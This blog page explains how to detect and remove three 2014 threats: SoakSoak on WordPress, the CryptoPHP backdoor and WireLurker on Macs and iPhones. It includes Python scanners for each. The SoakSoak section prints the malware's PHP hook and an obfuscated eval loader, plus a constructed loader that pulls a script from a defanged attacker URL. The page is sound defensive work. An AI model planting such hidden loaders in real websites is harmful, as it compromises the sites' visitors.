Showing posts with label WireLurker.

15/12/2014

New SoakSoak Malware Compromises Over 100,000+ WordPress Websites

Users of WordPress, the free and open-source blogging tool and content management system (CMS), are being warned of a widespread malware campaign that has already compromised more than 100,000 websites worldwide, and the count is still rising.

Early Sunday morning, news spread through the WordPress community of a widespread malware attack that had already compromised over 100,000 websites. The campaign is served from the domain SoakSoak.ru, hence the name 'SoakSoak malware'. Infected sites behave erratically: visitors are unexpectedly redirected to SoakSoak.ru pages, and malicious files may be downloaded to their computers without consent. Google has already added over 11,000 affected websites to its blacklist, which can have a serious effect on those site owners' revenue.

The infections are not restricted to WordPress sites, but WordPress appears to be the largest platform affected. According to Sucuri, a WordPress security vendor, the exact method of intrusion has not yet been pinpointed, although several signals suggest that many WordPress sites fell victim through a recent vulnerability in the premium Slider Revolution plugin (a plugin that is often bundled inside commercial themes, so a site owner may be running it without knowing). If you are a site owner worried about your own site, run it through Sucuri's free SiteCheck scanner to see whether the malware has already burrowed its way in.
How to remove SoakSoak malware (Sucuri – SoakSoak – SiteCheck)

SoakSoak Malware Anatomy
It modifies the file wp-includes/template-loader.php and appends this content:
<?php
function FuncQueueObject()
{
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
Because the hook fires on every page load, this causes wp-includes/js/swfobject.js (the WordPress core script registered under the 'swfobject' handle) to be loaded on every page of the site, and that file has been modified to contain the malware:
eval(decodeURIComponent("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Decoded, the part of the string that is visible above (the middle is elided in the original) reads roughly "(function(){ ...ript.id='xxyyzz_petushok'; head.appendChild(script); }());". It is a self-invoking function that tags a dynamically created script element with the id xxyyzz_petushok and appends it to the document head; the elided part is where that element is created and pointed at the attacker's server, so every page of the site ends up loading JavaScript malware from the SoakSoak.ru domain, specifically this file:
hxxp://soaksoak.ru/xteas/code

How to Remove SoakSoak Malware
At the time of writing there is no official removal procedure, but the following steps will bring the infection down.
1. If you have installed a theme, template or plugin obtained from SoakSoak.ru, remove it immediately.
2. Wherever your WordPress site is hosted, check all of its files for the code shown above; wp-includes/template-loader.php and wp-includes/js/swfobject.js are the files known to be modified.
3. If you have never visited SoakSoak.ru but your WordPress site is behaving strangely, log in, open the theme and plugin files (for example through the theme editor), look for the code shown above and remove it where found. Also update or remove the Slider Revolution plugin, since an unpatched copy is the suspected way in; otherwise the site will simply be reinfected.
4. When you have finished steps 1 to 3, go back to the free SiteCheck scanner and scan again to confirm the site is clean.
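As an added example (not code from the original post or from Sucuri), here is a scanner that looks for the two indicators shown above and, rather than trusting a string match on the JavaScript, decodes the eval(decodeURIComponent(...)) wrapper to report the remote script the loader pulls in. The WordPress tree it scans is constructed in a temporary directory, and the encoded loader planted in swfobject.js is a constructed stand-in modelled on the decoded fragment above (the full original string is not on this page); the URL is left defanged as hxxp://.

```python
"""Added example: scan a WordPress tree for the SoakSoak indicators and decode
the obfuscated loader. Sample site and loader are constructed for the demo."""
import os
import re
import tempfile
from urllib.parse import quote, unquote

# Indicator 1: the hook appended to wp-includes/template-loader.php.
HOOK_RE = re.compile(
    r"""add_action\(\s*["']wp_enqueue_scripts["']\s*,\s*["']FuncQueueObject["']""")

# Indicator 2: eval(decodeURIComponent("%..")) in a JavaScript file.
EVAL_RE = re.compile(
    r"""eval\s*\(\s*decodeURIComponent\s*\(\s*["']((?:%[0-9A-Fa-f]{2}|[^"'\\])+)["']\s*\)\s*\)""")

# Where a script element injected by such a loader points.
SRC_RE = re.compile(r"""\.src\s*=\s*["']([^"']+)["']""")


def decode_eval_payloads(js_text):
    """Return the plaintext of every eval(decodeURIComponent("...")) in js_text."""
    return [unquote(m.group(1)) for m in EVAL_RE.finditer(js_text)]


def injected_script_sources(js_text):
    """Decode the loader(s) in js_text and report the remote script URL(s) they pull in."""
    urls = []
    for body in decode_eval_payloads(js_text):
        urls.extend(SRC_RE.findall(body))
    return urls


def scan_site(root):
    """Walk a WordPress install; return (kind, relative path, detail) tuples."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name.endswith(".php") and HOOK_RE.search(text):
                findings.append(("php-hook", os.path.relpath(path, root), "FuncQueueObject"))
            elif name.endswith(".js"):
                for url in injected_script_sources(text):
                    findings.append(("js-loader", os.path.relpath(path, root), url))
    return findings


# Constructed loader modelled on the decoded fragment in the post (URL defanged).
SAMPLE_LOADER = (
    "(\r\nfunction()\r\n{\r\n"
    "\tvar head=document.getElementsByTagName('head')[0];\r\n"
    "\tvar script=document.createElement('script');\r\n"
    "\tscript.src='hxxp://soaksoak.ru/xteas/code';\r\n"
    "\tscript.id='xxyyzz_petushok';\r\n"
    "\thead.appendChild(script);\r\n}()\r\n);"
)

# The PHP hook exactly as quoted in the post.
INJECTED_PHP = (
    '<?php\nfunction FuncQueueObject()\n{\nwp_enqueue_script("swfobject");\n}\n'
    "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');\n"
)


def build_sample_site(root):
    """Write a minimal, constructed WordPress layout with both indicators planted."""
    inc = os.path.join(root, "wp-includes")
    os.makedirs(os.path.join(inc, "js"))
    with open(os.path.join(inc, "template-loader.php"), "w") as fh:
        fh.write(INJECTED_PHP + "// ...rest of the genuine template loader...\n")
    encoded = quote(SAMPLE_LOADER, safe="")   # same %XX encoding the malware uses
    with open(os.path.join(inc, "js", "swfobject.js"), "w") as fh:
        fh.write('eval(decodeURIComponent("%s"));\n' % encoded)
    with open(os.path.join(inc, "js", "clean.js"), "w") as fh:
        fh.write("document.title='ok';\n")   # control file: must not be flagged
    return root


def demo():
    """Build the sample site in a temp dir and return what the scan finds."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return sorted(scan_site(root))


if __name__ == "__main__":
    for kind, path, detail in demo():
        print("%-10s %-40s %s" % (kind, path, detail))
```

Point scan_site() at a real document root instead of the constructed one. When the hook turns up, treat wp-includes/template-loader.php and wp-includes/js/swfobject.js as untrusted and replace them with copies from a fresh WordPress download of the same version rather than editing around the injection, and close the entry point (the Slider Revolution plugin, if present) before rescanning with SiteCheck, or the site will simply be reinfected.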

26/11/2014

How to Clear/Remove CryptoPHP PHP Deadly Malware



What is CryptoPHP
CryptoPHP is a backdoor named by Fox-IT's security research team, which first saw it in 2013. It is distributed inside pirated ('nulled') themes and plug-ins for content management systems and attacks web servers through them. This works because most web administrators today build their sites on a CMS rather than raw HTML, and sites running the popular ones, WordPress, Joomla and Drupal, are all affected when their administrators install pirated themes and plug-ins. Once such a backdoored theme or plug-in is installed on your website, the attackers can control the backdoor manually or through command-and-control (C2) and e-mail communications. From then on they use your website for illegal search engine optimization, known as Blackhat SEO.
CryptoPHP carries several hardcoded domains for command-and-control communication and uses RSA encryption to protect its traffic to the C2 servers. Some versions also have a backup ability to communicate over e-mail if the C2 domains are taken down. The malware can update itself, inject content into the compromised sites it sits on, and perform several other functions. Fox-IT has published a very in-depth whitepaper on it. Its operators currently abuse the backdoor for illegal search engine optimization, also known as Blackhat SEO. The backdoor is a well-developed piece of code, dynamic in its use, and its capabilities include:
*. Integration into popular content management systems like WordPress, Drupal and Joomla.
*. Public key encryption for communication between the compromised server and the command and control (C2) server.
*. An extensive infrastructure in terms of C2 domains and IPs.
*. Backup mechanisms in place against C2 domain takedowns in the form of email communication.
*. Manual control of the backdoor besides the C2 communication.
*. Remote updating of the list of C2 servers.
*. Ability to update itself.
In the last few days Abuseat/CBL have added CryptoPHP detection to their database and are now listing the IP addresses of servers that host it, so an infected server's IP is likely to end up blacklisted.

How to Detect and Clean CryptoPHP PHP Malware
The attackers deliver the backdoor as a PHP script disguised as an image, typically named social.png (hence the social*.png glob below), which is then include()d from one of the theme's or plug-in's PHP files. Here is a simple command that finds all such files and prints the first 80 characters after the PHP open tag, just to confirm their content:
find /home/ -name "social*.png" -exec grep -E -o 'php.{0,80}' {} \; -print
Delete those files, but also examine the account that owns them: deleting the dropper alone removes neither the theme or plug-in that includes it nor whatever else the attacker has done. The following command casts a wider net:
find -L /home -type f -name '*.png' -print0 | xargs -0 file | grep "PHP script" > /root/crypto.txt
This checks every .png file under /home and writes out those that are actually PHP scripts (extend the -name pattern to .jpg and .gif as well). Also run a maldet or ClamAV scan on the server to find CryptoPHP; update both before scanning:
freshclam
maldet -u
Once the server is clean, submit an IP removal request to CBL.
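The two one-liners above do their job, but the logic they rely on deserves to be spelled out: an image file is suspicious when its first bytes are not the magic number of the format its extension claims, and it is a dropper when those bytes are a PHP open tag; and the dropper is only half the story, because a PHP file somewhere in the nulled theme include()s it, and that file has to go too. The following Python is an added example, not from the original post or from Fox-IT; it reproduces both checks over a site tree constructed in a temporary directory (the 'nulled-theme' folder and its contents are made up for the demonstration) and reports the first 80 bytes of each hit, as the grep above does.

```python
"""Added example: find image files that are really PHP, and the PHP files that
include them. The site tree is constructed here for the demonstration."""
import os
import re
import tempfile

# Leading bytes a genuine file of each type must start with.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_OPEN = re.compile(rb"<\?(php\b|=)", re.I)

# include 'images/social.png';   require_once("x/social.png");
INCLUDE_RE = re.compile(
    rb"""\b(?:include|require)(?:_once)?\s*\(?\s*["']([^"']+\.(?:png|jpe?g|gif))["']""", re.I)


def classify_image(path):
    """Return (verdict, snippet): 'ok', 'php' (PHP open tag) or 'mismatch' (wrong magic)."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(512)
    if any(head.startswith(m) for m in MAGIC.get(ext, ())):
        return "ok", b""
    m = PHP_OPEN.search(head)
    if m:
        return "php", head[m.start():m.start() + 80]   # same 80-byte peek as the grep
    return "mismatch", head[:80]


def find_disguised_php(root):
    """Every file with an image extension whose content is not that image format."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in MAGIC:
                path = os.path.join(dirpath, name)
                verdict, snippet = classify_image(path)
                if verdict != "ok":
                    findings.append((verdict, os.path.relpath(path, root),
                                     snippet.decode("latin-1")))
    return sorted(findings)


def find_includers(root):
    """PHP files that include/require an image path: the other half of the infection."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            for m in INCLUDE_RE.finditer(data):
                hits.append((os.path.relpath(path, root), m.group(1).decode("latin-1")))
    return sorted(hits)


def build_sample_site(root):
    """Constructed tree: one dropper, its includer, a clean theme file, a real PNG, a junk GIF."""
    theme = os.path.join(root, "wp-content", "themes", "nulled-theme")
    os.makedirs(os.path.join(theme, "images"))
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    files = {
        os.path.join(theme, "images", "social.png"):
            b"<?php /* constructed stand-in for the CryptoPHP dropper */ echo 1;",
        os.path.join(theme, "functions.php"): b"<?php\ninclude('images/social.png');\n",
        os.path.join(theme, "index.php"): b"<?php echo 'clean theme file';\n",
        os.path.join(root, "wp-content", "uploads", "logo.png"):
            b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        os.path.join(root, "wp-content", "uploads", "odd.gif"):
            b"not an image, not php either",
    }
    for path, data in files.items():
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree and return (disguised files, includers)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return find_disguised_php(root), find_includers(root)


if __name__ == "__main__":
    disguised, includers = demo()
    for verdict, path, snippet in disguised:
        print("%-8s %s  %r" % (verdict, path, snippet))
    for path, target in includers:
        print("includes %s -> %s" % (path, target))
```

Run find_disguised_php() and find_includers() against /home (or each account's document root) on the server; a 'mismatch' verdict is worth a look even without a PHP tag, since a file that is neither an image nor PHP should not be sitting in an images folder.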
Important Tips:
*. Do not install web templates or themes from unknown sources, and never from 'nulled' (pirated) ones.
*. Before installing a file, scan the whole archive with a well-known online scanner such as VirusTotal or Metascan Online.
*. If you are a web developer, open every file and look for unknown code or character sequences (obfuscated strings, unexpected include()s of image files); if you find any, remove them.

21/11/2014

How To Detect And Remove WireLurker Malware From iPhone, iPad



What is WireLurker?
The WireLurker malware, known to infect OS X powered Macs and iOS devices has stirred up the Apple community. Malware that successfully infects Apple products is rare. On the Mac that was because criminals tended to go after the much bigger Windows market, while on the iPhone and iPad, Apple's App Store security has been exemplary. Known to exist as a threat in China

How do I detect WireLurker?

The WireLurker malware installs a number of files on your OS X system, which set it up to detect any iOS device you attach by USB cable and then install malware onto that device. If you have any of these files on your Mac, you likely have the malware installed. They have been outlined by Palo Alto Networks, the company that discovered the malware, and for the current variant include the following:
1. A file called run.sh in Macintosh HD > Users > Shared
2. Either of the following files in Macintosh HD > Library > LaunchDaemons:
com.apple.machook_damon.plist
com.apple.globalupdate.plist
3. Any of the following files in Macintosh HD > System > Library > LaunchDaemons:
com.apple.appstore.plughelper.plist
com.apple.MailServiceAgentHelper.plist
com.apple.systemkeychain-helper.plist
4. In addition, the following files and folders will be in the hidden /usr/bin directory (open it by pressing Shift-Command-G in the Finder and entering "/usr/bin" in the path field) or under /usr/local:
globalupdate
/usr/local/machook/ (a folder)
WatchProc
itunesupdate
com.apple.MailServiceAgentHelper
If you see any or all of these files in your Mac’s hard drive, then your Mac has likely been compromised.
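The list above is only good until the next variant renames its files, so here is an added example (not from the original post or from Palo Alto Networks) that does two things: it checks for the named plists and paths, and it also parses every job in a LaunchDaemons folder and flags any in /Library/LaunchDaemons whose Label squats on Apple's com.apple.* namespace, on the assumption (a heuristic, not something the page states) that Apple's own jobs live under /System/Library/LaunchDaemons and no honest vendor labels its daemon com.apple.something. Each hit is resolved to the program the job launches, since that binary must be deleted along with the plist. The folders scanned here are built in a temporary directory; com.apple.totallylegit, com.apple.update-helper and com.vendor.updater are constructed names, and /usr/local/machook/machook is a constructed program path under the real /usr/local/machook folder.

```python
"""Added example: triage launchd folders for WireLurker indicators and for
look-alike jobs. Folders and the odd names below are constructed for the demo."""
import os
import plistlib
import tempfile

# Launch daemon plists named in the Palo Alto Networks list quoted above.
KNOWN_PLISTS = {
    "com.apple.machook_damon.plist",
    "com.apple.globalupdate.plist",
    "com.apple.appstore.plughelper.plist",
    "com.apple.MailServiceAgentHelper.plist",
    "com.apple.systemkeychain-helper.plist",
}
# Files and folders from the same list (absolute paths on the Mac).
KNOWN_PATHS = [
    "/Users/Shared/run.sh",
    "/usr/local/machook",
    "/usr/bin/globalupdate",
    "/usr/bin/WatchProc",
    "/usr/bin/itunesupdate",
    "/usr/bin/com.apple.MailServiceAgentHelper",
]


def check_known_files(prefix=""):
    """Known WireLurker paths that exist; prefix lets the demo use a fake root."""
    return [p for p in KNOWN_PATHS if os.path.lexists(prefix + p)]


def launched_program(job):
    """The executable a launchd job starts: Program, else ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None


def scan_launch_daemons(folder, third_party):
    """Return (reason, plist path, program) for suspicious jobs in a LaunchDaemons folder.

    third_party=True means the folder is /Library/LaunchDaemons. Heuristic
    (assumption): Apple's own jobs live in /System/Library/LaunchDaemons, so a
    com.apple.* Label in the third-party folder is a red flag.
    """
    findings = []
    for name in sorted(os.listdir(folder)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(folder, name)
        try:
            with open(path, "rb") as fh:
                job = plistlib.load(fh)
        except Exception:   # malformed or not a plist at all: worth a look either way
            findings.append(("unparseable", path, None))
            continue
        prog = launched_program(job)
        known_prog = prog is not None and (
            prog in KNOWN_PATHS or prog.startswith("/usr/local/machook/"))
        if name in KNOWN_PLISTS:
            findings.append(("known-wirelurker-plist", path, prog))
        elif known_prog:
            findings.append(("known-wirelurker-binary", path, prog))
        elif third_party and job.get("Label", "").startswith("com.apple."):
            findings.append(("apple-namespace-in-library", path, prog))
    return findings


def build_sample(root):
    """Constructed folders: two WireLurker jobs, a look-alike, a vendor job, an Apple job."""
    lib = os.path.join(root, "Library", "LaunchDaemons")
    sys_lib = os.path.join(root, "System", "Library", "LaunchDaemons")
    shared = os.path.join(root, "Users", "Shared")
    for d in (lib, sys_lib, shared):
        os.makedirs(d)
    with open(os.path.join(shared, "run.sh"), "w") as fh:
        fh.write("#!/bin/sh\n# constructed stand-in for the dropped script\n")
    jobs = {
        (lib, "com.apple.machook_damon.plist"):          # real name from the list
            {"Label": "com.apple.machook_damon", "ProgramArguments": ["/usr/local/machook/machook"]},
        (lib, "com.apple.totallylegit.plist"):           # constructed look-alike
            {"Label": "com.apple.totallylegit", "ProgramArguments": ["/Users/Shared/helper"]},
        (lib, "com.apple.update-helper.plist"):          # constructed name, known binary
            {"Label": "com.apple.update-helper", "ProgramArguments": ["/usr/bin/globalupdate"]},
        (lib, "com.vendor.updater.plist"):               # constructed benign third-party job
            {"Label": "com.vendor.updater", "Program": "/Library/Vendor/updater"},
        (sys_lib, "com.apple.securityd.plist"):          # genuine Apple daemon, in Apple's folder
            {"Label": "com.apple.securityd", "ProgramArguments": ["/usr/sbin/securityd"]},
        (sys_lib, "com.apple.systemkeychain-helper.plist"):   # real name from the list
            {"Label": "com.apple.systemkeychain-helper", "ProgramArguments": ["/usr/bin/itunesupdate"]},
    }
    for (folder, name), job in jobs.items():
        with open(os.path.join(folder, name), "wb") as fh:
            plistlib.dump(job, fh)
    return lib, sys_lib


def demo():
    """Run the checks against the constructed root; return (files present, job findings)."""
    with tempfile.TemporaryDirectory() as root:
        lib, sys_lib = build_sample(root)
        hits = scan_launch_daemons(lib, True) + scan_launch_daemons(sys_lib, False)
        return check_known_files(root), [(r, os.path.basename(p), prog) for r, p, prog in hits]


if __name__ == "__main__":
    files, hits = demo()
    print("known files present:", files)
    for reason, plist, prog in hits:
        print("%-28s %-45s -> %s" % (reason, plist, prog))
```

On a real Mac, call check_known_files() with no prefix and scan_launch_daemons() on "/Library/LaunchDaemons" (third_party=True) and "/System/Library/LaunchDaemons" (third_party=False); both need read access to the folders, and removing a hit means unloading the job, deleting the plist and deleting the program it points at.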

How to protect against WireLurker?
The first step Mac users can take to protect themselves is to not download or run any applications that come from third-party app stores. In OS X's System Preferences, open "Security & Privacy" and set "Allow apps downloaded from" to "Mac App Store" (or "Mac App Store and identified developers"). This Gatekeeper setting stops the Mac from running software that is neither from the App Store nor signed by a registered developer. Next, install a decent OS X antivirus application; some of the best are free, so you have nothing to lose. Keep all the software on all your iOS and OS X devices up to date, since Apple is quite responsive about patching vulnerabilities. Finally, never connect your iPhone to an unknown or untrusted computer, whether Mac or PC, or even to an untrusted charger: a charger can be a small computer in its own right.

How do I remove WireLurker?
Fortunately, WireLurker appears to be easy to remove. All you have to do is delete the related files from the affected Macs or iOS devices.
For Jailbroken Users
Step 1: Install a file manager such as iFile or Filza, or use SSH to reach the device from your Mac or PC.
Step 2: Navigate to /Library/MobileSubstrate/DynamicLibraries.
Step 3: Look for a file named sfbase.dylib. If it is there, your device is infected; if not, breathe a sigh of relief. Deleting the file removes the visible component, but the recommended course is a complete restore of the iOS device from iTunes.
For Non-Jailbroken Users
Apple has since revoked the enterprise certificate the malware used, so a non-jailbroken device cannot be newly infected at this point, but it is possible that you picked up the malware before Apple took action. If you believe you are infected and are not jailbroken, read on.
Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile and delete it if you find one.
Step 3: Check all installed apps for strange behaviour and delete any suspicious ones. Again, a complete restore of the iOS device from iTunes is highly recommended until a more reliable solution appears.